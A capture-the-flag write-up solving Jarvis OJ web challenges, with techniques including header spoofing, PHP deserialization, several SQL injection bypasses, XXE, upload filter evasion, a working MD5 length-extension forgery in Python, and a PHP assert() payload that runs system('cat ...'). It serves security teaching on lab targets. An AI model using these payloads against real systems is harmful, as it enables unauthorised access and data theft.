0x00 Preface:
A good CTF platform I encountered recently, just for fun.
0x01 RE?:
This question is a bit esoteric. First download the attachment, which is named udf.so (followed by a long string of characters).

UDF is an extension interface of MySQL; in plain terms, it is a user-defined function. Since the suffix is .so, we can tell that the site runs in a Linux environment. A UDF file is loaded with this statement:
CREATE FUNCTION [Custom Function Name] RETURNS [Return Type]{STRING|INTEGER|REAL} SONAME ["Filename"];
First, locate the folder called plugin under the MySQL installation on the local Linux machine.
(Here the Linux MySQL instance is connected to remotely from a Windows environment.)
This shows the absolute path of the directory; the next step is to put the downloaded file into that directory.
According to the hint in the question (help_me), execute the SQL statement that queries this function's value.
Use the getflag function to obtain the flag.
PS: I already had this function here; it is not a problem with the statement.
0x02 PORT51:
Question link: http://web.jarvisoj.com:32770/
Enter the question; it requires accessing the site through port 51. Knowing that, access it directly with the curl command.
This question is not very difficult and the test point is narrow: a single command solves it. But errors can occur, and I think it may be because my home network is not assigned a public IP address. If you access it from a server, there will be no such problem.
0x03 LOCALHOST:
Problem entry: http://web.jarvisoj.com:32774/
After opening the question, it tells us that only localhost may access it.
This question tests the X-Forwarded-For (XFF) header, an HTTP extension header. In simple terms, XFF is used to identify the original IP address of a client that connects to the web server through an HTTP proxy.
Intercept and modify the HTTP request header, setting the X-Forwarded-For value to 127.0.0.1.
0x04 The Secret of the Shield Bureau:
Problem entry: web.jarvisoj.com:32768
After opening the question, the habit is to look at the source code first.
Access showimg.php and pass the parameter given in the source code.
Decode the parameter value with base64; it decodes to shield.jpg. We guess there is a file read vulnerability here. Encode showimg.php with base64 and pass it as the parameter.
Indeed, the source code of showimg.php is read. This file does some filtering and forbids access to the parent directory. Next, let's read the code of index.php.
index.php includes shield.php, which we read directly.
This file tells us the location of the flag, and showimg.php filters pctf, so we cannot read it directly through showimg.php. But it has a file_get_contents() function, which can be used in combination with the unserialize() in index.php to obtain the flag.
Construct the serialized string.
Access index.php, pass the serialized string into the class, and view the source to get the flag.
I didn't expect that accessing it directly would also give a fake flag; that was careless of me.
0x05 Login:
Problem entry: web.jarvisoj.com:32772
Enter the question, capture the request, and analyze it.
The response header hints at the SQL statement, and there is no need to elaborate on SQL here. The controllable point in the statement is $pass, wrapped in the md5 function. So first we need to understand md5(): when its second parameter is true, it returns the raw 16-byte binary digest instead of hex. Can we use this to construct a universal key for login?
Here we can see that aaaa is turned into alphanumerics plus a lot of garbage. So we need to know about a special string: ffifdyop. After md5() with raw output, this string becomes 'or'6[garbled bytes]. Let's test it locally and see the result.
Local testing is ok, the question is solved in one go.
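To make the md5($pass, true) point concrete, here is an added Python example (not code from the writeup): it reproduces the raw-digest splice the challenge's query performs, checks why the ffifdyop digest breaks out of the quotes, and shows the hardened form that binds the digest as a query parameter instead of concatenating it. The table and column names are assumptions.

```python
import hashlib

# Added example: models a query of the shape
#   select * from admin where pass = '" . md5($pass, true) . "'
# and contrasts it with a parameterised version. Table/column names are assumed.


def raw_md5(password: str) -> bytes:
    """MD5 with PHP's second argument true: the 16 raw digest bytes, not hex."""
    return hashlib.md5(password.encode()).digest()


def vulnerable_query(password: str) -> str:
    """String-concatenated query: raw digest bytes land inside the SQL text."""
    # latin-1 keeps every byte as one character, mirroring PHP's byte strings.
    raw_text = raw_md5(password).decode("latin-1")
    return "SELECT * FROM admin WHERE pass='" + raw_text + "'"


def breaks_out_of_quotes(password: str) -> bool:
    """True when the raw digest begins with 'or' in quotes followed by a digit.

    The WHERE clause then reads  pass='' or '6<junk>' ; MySQL converts the
    string '6<junk>' to the number 6 in boolean context, which is true, so
    the condition matches every row.
    """
    raw = raw_md5(password)
    return raw[:4] == b"'or'" and chr(raw[4]).isdigit()


def safe_query(password: str):
    """Hardened form: never concatenate; pass the hex digest as a bound parameter.

    Whatever bytes the digest contains, a bound parameter is data, not SQL.
    (A real login would also use a password hash such as bcrypt rather than MD5.)
    """
    digest_hex = hashlib.md5(password.encode()).hexdigest()
    return "SELECT * FROM admin WHERE pass=%s", (digest_hex,)


if __name__ == "__main__":
    for pw in ("aaaa", "ffifdyop"):
        print(pw, raw_md5(pw).hex(), breaks_out_of_quotes(pw))
        print("  ", vulnerable_query(pw))
```

The hardened query still hashes with MD5 only to stay comparable to the challenge; the injection disappears because the digest is bound, not spliced.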
0x06 IN A Mess:
Problem entry: http://web.jarvisoj.com:32780/
Access the question and capture the packet; a comment hints at index.phps, which we access directly.
It can be seen that three parameters are needed: a, b, and id.
First, for a we can use php://input and POST the string 1112 is a nice lab!, or use data:,1112 is a nice lab! directly;
b only needs to be longer than 5 characters, and the eregi function can be bypassed with %00;
id is a very loose weak comparison;
Finally, pass these three parameters to access it.
It gave a rather confusing string; at first I thought it was a flag, but after half a day of submitting it, it turned out to be a directory, so we continue to visit it.
A simple test shows that spaces and /**/ are filtered. We use /*[any character]*/ to bypass this and test the number of fields: with 3 fields the page displays normally, and with 4 it displays abnormally.
After confirming the number of fields, start leaking the database name. Many writeups online bypass the filter by double-writing keywords, but it can also be bypassed using the other filtered characters.
As seen here, the restriction is bypassed by using from; the echo position is 3, and we query the database name.
Query the table name: because quotes are filtered, use the database() function to get the table name first.
Query the column names, using hex encoding to bypass the quote filter in the statement.
With the table and column names, start querying the flag value.
0x07 flag is in the administrator's hand:
Question link: http://web.jarvisoj.com:32778/
After entering the question, gather information: the response header sets two cookies, so this question should revolve around those two values. Next we try to find the source code. There are no hints in the page source, so we try accessing robots.txt directly.
It is obviously not there, so let's try the setter's usual trick: visit index.php~ to download the source. Opening the file directly shows the source in reversed order, or it can be restored with Linux vim -r. Before restoring, rename the suffix to .swp. For easier viewing, let's use Kali to restore the file.
A simple analysis of the source shows that the role parameter must be a serialized admin, while hsh must be the MD5 of the reversed role concatenated with $salt. This is an attack point for hash length extension. Simply put, we know the value the server gives in the cookie, call it hash1, and it was computed over the salt. We can run an MD5 length extension on hash1 with admin to get hash2, assign hash2 to hsh, and that satisfies the code's check.
The calculation can be done by writing a Python script, or with the hashpump tool.
Get the final flag.
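The hash length extension the cookie check falls to, as an added Python example that is not the writeup's script or hashpump: a compact MD5 that can resume from an arbitrary chaining state, a length_extend() that forges md5(secret || msg || glue || suffix) from a known digest without the secret, and an HMAC-based tag shown rejecting the same forgery. The salt, message, and suffix are constructed values, and the salt length is taken as known, which in the challenge has to be guessed.

```python
import hashlib
import hmac
import math
import struct

# Added example (not the challenge's code): why md5($salt . $data) can be extended
# without knowing $salt, and why an HMAC does not have this problem.

_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
_INIT = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_M32 = 0xFFFFFFFF


def _rotl(x: int, c: int) -> int:
    return ((x << c) | (x >> (32 - c))) & _M32


def md5_padding(total_len: int) -> bytes:
    """Bytes MD5 appends to a message of total_len bytes: 0x80, zeros, 64-bit bit length."""
    zeros = b"\x00" * ((55 - total_len) % 64)
    return b"\x80" + zeros + struct.pack("<Q", (total_len * 8) & 0xFFFFFFFFFFFFFFFF)


def md5_from_state(data: bytes, state=_INIT, total_len=None) -> bytes:
    """MD5 of data, but starting from a given chaining state and padding as if
    total_len bytes had been hashed in all. With the defaults this is plain MD5."""
    if total_len is None:
        total_len = len(data)
    a0, b0, c0, d0 = state
    buf = data + md5_padding(total_len)          # always a multiple of 64 bytes
    for off in range(0, len(buf), 64):
        m = struct.unpack("<16I", buf[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(64):
            if i < 16:
                f, g = (b & c) | (~b & d), i
            elif i < 32:
                f, g = (d & b) | (~d & c), (5 * i + 1) % 16
            elif i < 48:
                f, g = b ^ c ^ d, (3 * i + 5) % 16
            else:
                f, g = c ^ (b | ~d), (7 * i) % 16
            f = (f + a + _K[i] + m[g]) & _M32
            a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _M32
        a0, b0, c0, d0 = (a0 + a) & _M32, (b0 + b) & _M32, (c0 + c) & _M32, (d0 + d) & _M32
    return struct.pack("<4I", a0, b0, c0, d0)


def length_extend(known_digest: bytes, known_len: int, suffix: bytes):
    """Given md5(secret || msg) and len(secret) + len(msg), return (glue + suffix, digest)
    such that md5(secret || msg || glue || suffix) == digest. The secret is never needed:
    the known digest *is* the chaining state after the original padded message."""
    glue = md5_padding(known_len)
    state = struct.unpack("<4I", known_digest)
    new_len = known_len + len(glue) + len(suffix)
    return glue + suffix, md5_from_state(suffix, state, new_len)


def tag_concat(secret: bytes, msg: bytes) -> bytes:
    """The challenge's construction: md5(secret || msg). Extendable."""
    return hashlib.md5(secret + msg).digest()


def tag_hmac(secret: bytes, msg: bytes) -> bytes:
    """The fix: HMAC. The secret is mixed in on both sides of the hash, so a digest
    computed by extension never matches."""
    return hmac.new(secret, msg, hashlib.md5).digest()


def demo():
    secret = b"constructed_salt_value"   # constructed; the real $salt is unknown to the client
    msg = b"tseug"                      # constructed stand-in for strrev($role)
    known = tag_concat(secret, msg)     # what the server hands out in the cookie
    forged_suffix, forged_tag = length_extend(known, len(secret) + len(msg), b"nimda")
    forged_msg = msg + forged_suffix
    return (
        hmac.compare_digest(tag_concat(secret, forged_msg), forged_tag),  # True: accepted
        hmac.compare_digest(tag_hmac(secret, forged_msg), forged_tag),    # False: rejected
    )


if __name__ == "__main__":
    print(demo())
```

The glue bytes are the padding the server itself would have appended, which is why the attacker has to know the total length of salt plus message; everything else comes from the published digest.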
0x08 Chopper:
This question may have some problems; the writeups found online could not be reproduced either, so there will be no further elaboration here.
0x09 Easy Gallery:
Problem entry: http://web.jarvisoj.com:32785/
Enter the question; an upload point is found at index.php?page=submit.
Capture the packet and change the filename for testing; first upload an empty file to try.
The encoding format causes some minor ugliness, but overall that is not a big problem. Here we determine that it is the file header that is being checked.
We add a GIF89a header and successfully bypass the filter. The next step is to upload PHP code directly inside it.
The uploaded PHP code is accepted, and we can get the file path through the ID in the view page. The file path is uploads/1646740311.jpg, and now we can use the page parameter in the URL to pass the path of the uploaded file.
The code appends a .php suffix after the filename, so we use %00 to cut it off, but we still don't get the flag.
It still reports that the file does not exist. The initial guess is that the code filters strings like <?php, so we use another way to write the PHP file.
Access this file to get the flag.
PS: We were originally afraid that eval would be filtered, so we tested with phpinfo, and unexpectedly got the flag directly.
0x10 Simple Injection:
Problem entry: http://web.jarvisoj.com:32787/
According to the hint in the question, this is a simple injection. Enter an account and password and capture the packet.
Here, when the username is admin, it prompts that the password is wrong; when the username is anything else, it reports that the username is wrong. So this question should be boolean-based blind injection. Let's test whether the injection point is in the username field.
The injection point is found. The code filters spaces, which is this setter's usual style. The next step is to brute-force the data by writing a Python injection script.
Crack the MD5 hash by lookup.
Normal login to get the flag.
0x11 API call:
Problem entry: http://web.jarvisoj.com:9882/
Enter the question and view the source; we see XMLHttpRequest in the code, suggesting that XML is involved. Click go and capture the packet; we see the data sent in JSON format.
Here we change the Content-Type to application/xml and replace the JSON body with our XML data. Read /home/ctf/flag.txt as indicated in the question.
0x12 PHPINFO:
Problem entry: http://web.jarvisoj.com:32784/
Opening the file, at first glance there seems to be nothing wrong, and the input is not controllable. However, the second line contains ini_set('session.serialize_handler', 'php');, which immediately makes us think of PHP session deserialization. We pass in a parameter to check the settings in its phpinfo.
Jump straight to the settings about session.
PHP has built-in handlers for serializing and deserializing $_SESSION data. Three are commonly used; the default before PHP 5.5.4 is php, and from 5.5.4 on it is php_serialize. If the session serialize handler differs from the default, it can lead to vulnerabilities. Additionally, session.upload_progress.enabled is On. When a variable with the same name as session.upload_progress.name is POSTed, PHP stores the filename in $_SESSION. The conditions for session deserialization are now in place; we just need to construct a form that both uploads a file and POSTs that variable, and submit it.
Here we upload an arbitrary file and capture the packet, having constructed the serialized string in advance. One problem is that double quotes get escaped, so we need to add a \ in front of each, and also add | at the beginning.
Change the filename to the deserialization string we constructed. We can see that we have successfully obtained the location of the flag file. Now we need to go back and check the path stored in the session file.
With this path, construct the next deserialization string. Here we use file_get_contents() to read the file into a string and finally echo it out.
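To show the handler mismatch behind this, here is an added Python model (not PHP's own code) of the two serialisation formats the page discusses, restricted to string values: php_serialize writes the whole $_SESSION as one serialized array, while the php handler reads key|value records split at the first '|'. The session key name and file names are constructed, and the quote-escaping the writeup mentions is omitted from the model.

```python
import re

# Added, simplified model of PHP's two session serialisation handlers.
# Only string values are supported, which is all the demonstration needs.


def php_serialize_str(s: str) -> str:
    """PHP serialize() of a string: s:<byte length>:"<bytes>";"""
    return 's:%d:"%s";' % (len(s.encode()), s)


def unserialize_str(data: str):
    """Minimal unserialize for the s:N:"...": form; returns (value, unconsumed rest).
    As in PHP, whatever follows a complete value is simply left over."""
    m = re.match(r's:(\d+):"', data)
    if not m:
        raise ValueError("not a serialized string")
    n, start = int(m.group(1)), m.end()
    value = data[start:start + n]
    if data[start + n:start + n + 2] != '";':
        raise ValueError("malformed serialized string")
    return value, data[start + n + 2:]


def write_php_serialize(session: dict) -> str:
    """php_serialize handler: the whole $_SESSION array stored as one serialized value."""
    body = "".join(php_serialize_str(k) + php_serialize_str(v) for k, v in session.items())
    return "a:%d:{%s}" % (len(session), body)


def read_php(raw: str) -> dict:
    """php handler: a sequence of key|serialized-value records; the key is everything
    before the first '|', and the value is unserialized from what follows."""
    session = {}
    while "|" in raw:
        key, _, raw = raw.partition("|")
        value, raw = unserialize_str(raw)
        session[key] = value
    return session


def handler_mismatch(write_handler: str, read_handler: str) -> bool:
    """The precondition the page describes: written by one handler, read by another."""
    return write_handler != read_handler


def demo():
    # session.upload_progress stores the uploaded file name under a key derived from
    # session.upload_progress.name; the key name used here is constructed.
    benign = write_php_serialize({"upload_progress_demo": "avatar.jpg"})
    # Same flow, but the submitted file name starts with '|' followed by a serialized
    # value. Under the php handler that value becomes a session variable of the
    # client's choosing; a harmless string stands in for it here.
    hostile = write_php_serialize({"upload_progress_demo": '|s:5:"owned";'})
    return read_php(benign), read_php(hostile)


if __name__ == "__main__":
    print(handler_mismatch("php_serialize", "php"))
    print(demo())
```

Read consistently, the file name is just array data; read by the php handler, everything before the first '|' becomes a meaningless key and the client-supplied serialized value is what gets unserialized, which is the foothold the writeup goes on to use.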
0x13 admin:
Problem entry: http://web.jarvisoj.com:32792/
Enter the question environment. There are no hints in the source code. Consider the issue of information leakage and access robots.txt.
Access it directly to see.
Here is a fake flag. Combining this with the question title, check the cookie.
Directly change it to 1 to get the flag.
0x14 WEB?:
Problem entry: http://web.jarvisoj.com:9891/
After opening the question, check the source code. The password is verified by JavaScript, and a file called app.js is included, which we can follow up on.
First, format it online; since it's a password, search for 'password'.
Follow up checkpass.
Follow up __checkpass__REACT_HOT_LOADER__.
A matrix?? Write a script to solve for the flag.
0x15 inject:
Problem entry: http://web.jarvisoj.com:32794/
According to the hint in the problem, find the source code first. robots.txt does not exist, so the setter's old trick applies again: access index.php~.
Audit the code: the backticks ` ` prevent errors when a field name is a keyword, and adding backticks to the statement does not break it. So we construct desc `test` ` [union injection statement] to perform SQL injection. But only the first result is displayed, so limit is used to make the data visible.
We have obtained the database name and start querying the tables. The problem filters single quotes, so we inject without them, querying the data one row at a time.
Among so many tables, the first one is obviously the table that stores the flag. Next, query the column names in the same way.
The table and column names are all there, so we can directly query the data.
0x16 babyphp:
Problem entry: http://web.jarvisoj.com:32798/
Enter the problem; in the about page I found three similar hints, of which git suggests a possible git leak, so we access the git directory.
No 404 is returned, indicating that the git directory exists. Use a git scanning tool to retrieve the PHP source, and look at the key part:
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "templates/" . $page . ".php";
// a string passed to assert() is evaluated as PHP code, and $file is interpolated into it
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
There is a dangerous function here: assert. assert($assertion [, $description]) checks the given assertion and takes appropriate action if the result is false; when the assertion is a string, it is evaluated as PHP code. Knowing this, we can directly construct the payload ?page='.system('cat templates/flag.php').' to view the source and obtain the flag.